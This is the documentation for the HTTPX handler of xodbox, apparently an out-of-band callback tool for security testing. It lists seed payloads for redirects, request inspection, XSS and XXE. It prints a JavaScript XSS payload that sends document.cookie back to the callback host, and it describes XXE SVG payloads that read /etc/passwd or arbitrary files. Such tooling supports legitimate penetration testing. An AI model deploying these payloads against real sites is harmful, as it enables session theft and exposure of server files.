This is the multi-page printable view of this section. Click here to print.

Return to the regular view of this page.

HTTPX

HTTPX Handler

1: Default Payloads Seeds

1.1: Default Header
1.2: Redirect
1.3: Robots TXT
1.4: Inspect
1.5: XSS HTML
1.6: XSS JavaScript
1.7: Default Favicon
1.8: HTML Iframe
1.9: Open Graph
1.10: XXE Callback
1.11: XXE DTD
1.12: XXE SVG Hostname
1.13: XXE SVG Passwd
1.14: XXE SVG Request Params
1.15: XXE System
1.16: Default Page
1.17: In Development Seeds

1.17.1: WPAD

2: Example Payloads

2.1: List Payloads

Purpose

Speak HTTP to other computers you may or may not control….

Configuration

Key	Values
handler	Must be `HTTPX`
listener	Default `:80`
static_dir	Directory to host static files from
payload_dir	Directory to import payloads from

WIP configs that are not fully implemented

Key	Values
tls_domains	Comma seperated list of domains
acme_staging	Boolean. Shortcut to use `https://acme-staging-v02.api.letsencrypt.org/directory`
acme_directory_url	Override URL
autocert_accept_tos	Boolean. Do you accept the CAs TOS?

Additional Information

Things are still being created, documented, and fine-tuned.

New Features

Let’s Encrypt Auto Cert
Exfil data saver

Legacy Functionality to be implemented.

robots.txt
unfurly
arbitrary json
- b64
redirect
- b64
basic auth
breakfastbot
allow origin *

Legacy functionality that isnt specific to a handler

alert pattern with payload
alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
slack hook (this is now a notifier)

1 - Default Payloads Seeds

seed data

Default payloads that come with xodbox.

1.1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

1.2 - Redirect

HTTP Redirects

HTTP Redirects to the query parameter l using the query param s as the status code.

What	Description	GET Parameters
Location	Location to redirect to	`l`
Status	HTTP status code	`s`

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

1.3 - Robots TXT

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

1.4 - Inspect

Reflect back HTTP requests in various formats

Depends on an internal code

`/inspect`

Inspect or reflect the request back in various formats.

Plain Text (default, .txt)
HTML (.html, .html)
GIF (.gif)
JPEG (.jpg)
PNG (.png)
MP4 (.mp4)
XML (.xml)
JSON (.json)
Javascript (.js)

Examples

http://localhost/inspect
http://localhost/some/random/path/inspect.gif

1.5 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML to load simple JS Payload.

1.6 - XSS JavaScript

Returns JS that embeds an image back to xodbox

/jsc

Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{ .Host }}/jscb?src="+window.location+"&c="+document.cookie;
})()

1.7 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

1.8 - HTML Iframe

HTML page with iframe and image callback

/ht

Iframe callback

1.9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

1.10 - XXE Callback

More XXE

XXE Callback used by xxe-system

1.11 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

1.12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

attempts to get /etc/hostname

SVG with XXE payloads

1.13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

attempts to get /etc/passwd

1.14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

attempts to get whatever files is supplied via the f query parameter

1.15 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

1.16 - Default Page

returns a simple page if nothing is matched

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

hi

1.17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

1.17.1 - WPAD

Returns a WPAD config file (Javascript).

WPAD Proxy. Not really useful at the moment. Should be more useful in the future

2 - Example Payloads

Examples

Default payloads that come with xodbox.

2.1 - List Payloads

List payloads

List Payloads

---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    
    {{ end }}    
---